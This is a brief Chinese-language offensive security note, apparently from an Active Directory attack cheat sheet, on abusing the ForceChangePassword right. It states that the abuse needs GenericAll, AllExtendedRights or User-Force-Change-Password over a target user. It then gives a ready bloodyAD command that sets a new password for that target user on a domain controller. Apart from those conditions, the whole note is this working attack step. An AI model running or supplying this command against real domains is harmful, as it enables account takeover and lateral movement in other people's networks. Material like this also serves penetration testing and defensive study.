2.ForceChangePassword
1. 利用
1.1. 利用条件
当控制目标具有 GenericAll 、 AllExtendedRights 或 User-Force-Change-Password 目标用户的对象时,可能会发生这种滥用行为。
如:
1.2. 利用工具
1.2.1. bloodyAD
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
